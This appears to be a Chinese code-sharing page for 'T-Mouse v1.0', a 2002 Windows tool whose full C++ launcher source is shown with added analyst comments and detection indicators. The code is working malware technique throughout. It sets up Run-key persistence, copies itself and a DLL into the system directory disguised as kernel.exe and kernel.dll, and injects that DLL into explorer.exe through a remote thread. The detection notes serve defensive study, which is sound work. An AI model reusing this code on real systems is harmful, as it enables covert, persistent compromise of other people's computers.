T-Mouse v1.0 基于远程线程结构程序vc++.rar

  • Visual C++
    开发工具
  • 2KB
    文件大小
  • rar
    文件格式
  • 2005-09-10 21:47
    上传日期
基于远程线程结构程序。开发环境vc++。
T-Mouse v1.0 基于远程线程结构程序vc++.rar
  • MyDll.cpp
    1.3KB
  • www.pudn.com.txt
    218B
  • T-Mouse.cpp
    5.1KB
内容介绍
/*
 * T-Mouse v1.0 launcher, as listed on this page (reformatted; code unchanged).
 *
 * Analyst summary of what the visible code does, in call order:
 *   1. rgst()  - writes a value named "kernel" under
 *                HKLM\Software\Microsoft\Windows\CurrentVersion\Run and copies
 *                MyDll.dll -> <system dir>\kernel.dll and the running
 *                executable -> <system dir>\kernel.exe.
 *   2. start() - prints the banner.
 *   3. main()  - looks up the PID of explorer.exe, writes the DLL path into
 *                that process and starts a remote thread at LoadLibraryW so
 *                the DLL is loaded inside explorer.exe.
 *
 * Artifacts a defender can look for (all taken from this listing):
 *   - Run value "kernel" in the HKLM Run key, data ending in "\kernel.exe".
 *   - Files kernel.exe and kernel.dll in the system directory.
 *   - A remote thread created in explorer.exe whose start address is
 *     kernel32!LoadLibraryW, followed by an image load of MyDll.dll or
 *     kernel.dll in explorer.exe (e.g. Sysmon CreateRemoteThread / ImageLoad
 *     / registry value-set events).
 *
 * What the injected DLL does is not shown: MyDll's source is not part of
 * this listing.
 */
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>
#include "psapi.h"
#pragma comment (lib,"psapi")

DWORD processtopid(char *);
BOOL rgst();
void start();

/* File-scope state. pdwthreadid, fdwcreate and dwstacksize are declared but
   never referenced in the visible listing. */
PDWORD pdwthreadid;
HANDLE hremotethread,hremoteprocess;
DWORD fdwcreate,dwstacksize,dwremoteprocessid;
PWSTR pszlibfileremote=NULL;   /* address of the DLL path inside the target process */

/*
 * Entry point: installs persistence, then loads the DLL into explorer.exe.
 *
 * Returns 0 after the remote thread has finished, -1 on any failed step.
 * Every exit path calls getche(), so the console waits for a key press.
 */
int main()
{
    int cb;
    char *argv1,*argv2,*argv3;
    char lpdllfullpathname[MAX_PATH];
    WCHAR pszlibfilename[MAX_PATH]={0};
    PTHREAD_START_ROUTINE pfnstartaddr;

    /* Hard-coded names despite the argv* naming: nothing is read from the
       command line. */
    argv1="explorer.exe";   /* target process */
    argv2="MyDll.dll";      /* DLL name looked for in the current directory */
    argv3="kernel.dll";     /* fallback name in the system directory (the name rgst() copies to) */

    /* Persistence runs first and its result is ignored, so the Run value and
       file copies are attempted even if the injection below fails. */
    rgst();
    start();

    /* processtopid() returns 0 when no match is found; that case is not
       checked here and surfaces as the OpenProcess failure below. */
    dwremoteprocessid=processtopid(argv1);

    if(GetCurrentDirectory(MAX_PATH,lpdllfullpathname)==0)
    {
        printf("GetCurrentDirectory Error: %d\n",GetLastError());
        getche();
        return -1;
    }

    /* Build <current dir>\MyDll.dll; strcat is unbounded against the
       MAX_PATH buffer. */
    strcat(lpdllfullpathname,"\\");
    strcat(lpdllfullpathname,argv2);

    /* _lopen is used only as an existence probe; the returned handle is not
       stored anywhere in this listing. */
    if((int)_lopen(lpdllfullpathname,OF_READ)==HFILE_ERROR)
    {
        /* Not in the current directory: fall back to <system dir>\kernel.dll. */
        GetSystemDirectory(lpdllfullpathname,MAX_PATH);
        strcat(lpdllfullpathname,"\\");
        strcat(lpdllfullpathname,argv3);
        if((int)_lopen(lpdllfullpathname,OF_READ)==HFILE_ERROR)
        {
            printf("DLL file could not be found!\n");
            getche();
            return -1;
        }
    }

    /* The path is converted to UTF-16 because the remote start routine is
       LoadLibraryW. The source length excludes the terminator; the
       zero-initialised destination supplies it. */
    if(MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpdllfullpathname,strlen(lpdllfullpathname),pszlibfilename,MAX_PATH)==0)
    {
        printf("MultiByteToWideChar Error: %d",GetLastError());
        getche();
        return -1;
    }

    /* Access mask requested on the target: create-thread plus VM
       operation/write. A handle to explorer.exe with this mask is itself a
       useful process-access detection signal. */
    hremoteprocess=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwremoteprocessid);
    if((int)hremoteprocess==NULL)
    {
        printf("Remote Process not Exist or Access Denied\n");
        getche();
        return -1;
    }

    /* Byte count of the wide path including its terminator. */
    cb=(1+lstrlenW(pszlibfilename))*sizeof(WCHAR);

    /* Read/write (non-executable) page in the target; it holds only the
       path string, not code. */
    pszlibfileremote=(PWSTR)VirtualAllocEx(hremoteprocess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
    if((int)pszlibfileremote==NULL)
    {
        printf("VirtualAllocEx Error: %d",GetLastError());
        getche();
        return -1;
    }

    if(WriteProcessMemory(hremoteprocess,pszlibfileremote,(PVOID)pszlibfilename,cb,NULL)==FALSE)
    {
        printf("WriteProcessMemory Error: %d",GetLastError());
        getche();
        return -1;
    }

    /* LoadLibraryW's address is resolved in this process and reused as the
       remote start routine; presumably relies on kernel32 being mapped at
       the same address in the target - confirm for the platform analysed. */
    pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");
    if((int)pfnstartaddr==NULL)
    {
        printf("GetProcAddress Error: %d\n",GetLastError());
        getche();
        return -1;
    }

    /* Remote thread: start address LoadLibraryW, parameter = remote path
       buffer. This is the event remote-thread telemetry records. */
    hremotethread=CreateRemoteThread(hremoteprocess,NULL,0,pfnstartaddr,pszlibfileremote,0,NULL);
    if((int)hremotethread==NULL)
    {
        printf("Create Remote Thread Error: %d\n",GetLastError());
        getche();
        return -1;
    }

    /* Blocks until the remote thread (the LoadLibraryW call) returns. */
    WaitForSingleObject(hremotethread,INFINITE);

    /* Only the path buffer is released; nothing in this listing unloads the
       DLL from the target afterwards. */
    if(pszlibfileremote!=NULL)
    {
        VirtualFreeEx(hremoteprocess,pszlibfileremote,0,MEM_RELEASE);
    }
    if(hremotethread !=NULL)
    {
        CloseHandle(hremotethread);
    }
    if(hremoteprocess!=NULL)
    {
        CloseHandle(hremoteprocess);
    }
    getche();
    return 0;
}

/*
 * Maps a process image name to a PID.
 *
 * inputprocessname: base name to match, compared case-insensitively.
 * Returns the first matching PID, 0 if none matched, or (DWORD)-1 if
 * EnumProcesses fails.
 *
 * Side effect worth noting for detection: every enumerated process is
 * opened with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, i.e. a sweep of
 * process-access events from this binary.
 */
DWORD processtopid(char *inputprocessname)
{
    DWORD aprocesses[1024],cbneeded,cprocesses;   /* at most 1024 PIDs are examined */
    UINT i;
    HANDLE hprocess;
    HMODULE hmod;
    char szprocessname[MAX_PATH]="UnknownProcess";

    if(!EnumProcesses(aprocesses,sizeof(aprocesses),&cbneeded))
    {
        return -1;
    }
    cprocesses=cbneeded/sizeof(DWORD);
    for(i=0;i<cprocesses;i++)
    {
        hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,aprocesses[i]);
        if(hprocess)
        {
            /* Room for one HMODULE only, so just the first module returned
               is queried for its base name. */
            if(EnumProcessModules(hprocess,&hmod,sizeof(hmod),&cbneeded))
            {
                GetModuleBaseName(hprocess,hmod,szprocessname,sizeof(szprocessname));
                if(!_stricmp(szprocessname,inputprocessname))
                {
                    CloseHandle(hprocess);
                    return (aprocesses[i]);
                }
            }
        }
    }
    /* Closes only whatever hprocess holds after the final iteration. */
    CloseHandle(hprocess);
    return 0;
}

/* Prints the tool banner to the console; no other effect. */
void start()
{
    printf("---[ T-mouse v1.0, by TOo2y ]---\n");
    printf("---[ E-mail: TOo2y@safechina.net ]---\n");
    printf("---[ HomePage: www.safechina.net ]---\n");
    printf("---[ Date: 9-26-2002 ]---\n\n");
    return;
}

/*
 * Persistence and file staging.
 *
 * Writes the Run value first, then copies the DLL and the executable into
 * the system directory. Returns FALSE only if the Run key cannot be opened
 * for writing or the value cannot be set; once the value is written it
 * returns TRUE whether or not either copy succeeded.
 *
 * Forensic notes:
 *   - Key:   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 *   - Value: "kernel" (REG_SZ), data = <system dir>\kernel.exe
 *   - The Run value can exist even when kernel.exe was never copied,
 *     because the registry write happens before the copies.
 */
BOOL rgst()
{
    HKEY hkey;
    LPSTR filenewname;
    LPSTR filecurrentname;
    DWORD type=REG_SZ;
    LPCTSTR rgspath="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    char currentpath[MAX_PATH];
    char syspath[MAX_PATH];
    long ret;

    /* lstrcat returns its destination, so filenewname aliases syspath. */
    GetSystemDirectory(syspath,MAX_PATH);
    filenewname=lstrcat(syspath,"\\kernel.exe");

    /* KEY_WRITE on an HKLM key - presumably needs an elevated/administrative
       token on the target system; verify for the OS under analysis. */
    ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
    if(ret!=ERROR_SUCCESS)
    {
        RegCloseKey(hkey);
        return FALSE;
    }

    /* cbData is MAX_PATH rather than the string length, so the stored data
       is MAX_PATH bytes long; bytes after the terminator are whatever
       syspath held. The fixed length is a recognisable trait of this value. */
    ret=RegSetValueEx(hkey,"kernel",NULL,type,(const unsigned char *)filenewname,MAX_PATH);
    if(ret!=ERROR_SUCCESS)
    {
        RegCloseKey(hkey);
        return FALSE;
    }
    RegCloseKey(hkey);

    /* Stage the DLL: <current dir>\MyDll.dll -> <system dir>\kernel.dll.
       Third argument TRUE = fail if the destination exists, so an existing
       kernel.dll is left untouched. */
    GetSystemDirectory(syspath,MAX_PATH);
    GetCurrentDirectory(MAX_PATH,currentpath);
    filecurrentname=lstrcat(currentpath,"\\MyDll.dll");
    filenewname=lstrcat(syspath,"\\kernel.dll");
    ret=CopyFile(filecurrentname,filenewname,TRUE);
    if(!ret)
    {
        /* A failed DLL copy ends the function here; the executable copy
           below is skipped. */
        return TRUE;
    }

    /* Stage the executable itself: running module -> <system dir>\kernel.exe,
       again without overwriting an existing file. */
    GetSystemDirectory(syspath,MAX_PATH);
    GetModuleFileName(NULL,currentpath,MAX_PATH);
    filecurrentname=currentpath;
    filenewname=lstrcat(syspath,"\\kernel.exe");
    ret=CopyFile(filecurrentname,filenewname,TRUE);
    if(!ret)
    {
        return TRUE;
    }
    return TRUE;
}